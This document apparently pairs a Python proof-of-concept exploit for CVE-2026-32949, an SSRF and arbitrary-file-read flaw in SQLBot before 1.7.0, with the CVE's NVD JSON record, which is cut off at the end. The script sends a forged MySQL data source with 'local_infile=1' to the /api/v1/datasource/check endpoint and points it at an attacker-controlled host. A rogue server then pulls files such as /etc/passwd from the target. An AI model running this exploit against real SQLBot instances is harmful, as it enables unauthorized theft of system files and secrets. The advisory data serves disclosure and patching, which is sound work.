CVE-2026-32949

import requests # Target URL of the vulnerable SQLBot instance target_url = "http://vulnerable-sqlbot-host/api/v1/datasource/check" # Attacker's controlled MySQL server address attacker_mysql_host = "attacker-controlled-server.com" # Payload to trigger the SSRF and file read # The key is the 'extraJdbc' parameter enabling local_infile payload = { "name": "exploit_ds", "host": attacker_mysql_host, "port": 3306, "username": "root", "password": "", "database": "test", "extraJdbc": "local_infile=1" } try: # Send the request to check the data source response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] SQLBot is now connecting to the rogue MySQL server.") print("[+] Ensure your rogue server sends 'LOAD DATA LOCAL INFILE' during handshake.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-32949", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:14.387", "lastModified": "2026-03-23T17:35:16.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a Server-Side Request Forgery (SSRF) vulnerability that allows an attacker to retrieve arbitrary system and application files from the server. An attacker can exploit the /api/v1/datasource/check endpoint by configuring a forged MySQL data source with a malicious parameter extraJdbc=\"local_infile=1\". When the SQLBot backend attempts to verify the connectivity of this data source, an attacker-controlled Rogue MySQL server issues a malicious LOAD DATA LOCAL INFILE command during the MySQL handshake. This forces the target server to read arbitrary files from its local filesystem (such as /etc/passwd or configuration files) and transmit the contents back to the attacker. This issue was fixed in version 1.7.0."}, {"lang": "es", "value": "SQLBot es un sistema inteligente de consulta de datos basado en un modelo de lenguaje grande y RAG. Las versiones anteriores a la 1.7.0 contienen una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) que permite a un atacante recuperar archivos arbitrarios del sistema y de la aplicación del servidor. Un atacante puede explotar el endpoint /api/v1/datasource/check configurando una fuente de datos MySQL falsificada con un parámetro malicioso extraJdbc='local_infile=1'. Cuando el backend de SQLBot intenta verificar la conectividad de esta fuente de datos, un servidor MySQL Rogue controlado por el atacante emite un comando LOAD DATA LOCAL INFILE malicioso durante el handshake de MySQL. Esto obliga al servidor objetivo a leer archivos arbitrarios de su sistema de archivos local (como /etc /passwd o archivos de configuración) y a transmitir el contenido de vuelta al atacante. Este problema fue solucionado en la versión 1.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:sqlbot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "2DFA6724-2EE1-4320-88E5-224E6C72E04D"}]}]}], "references": [{"url": "https://github.com/dataease/SQLBot/commit/ff98514827bad99b8fa4b39385adecc6e3d44355", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dataease/SQLBot/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/dataease/SQLBot/security/advisories/GHSA-wqj3-xcxf-j9m9", "source": "[email protected]", "tags": ["Exploit" ... (truncated)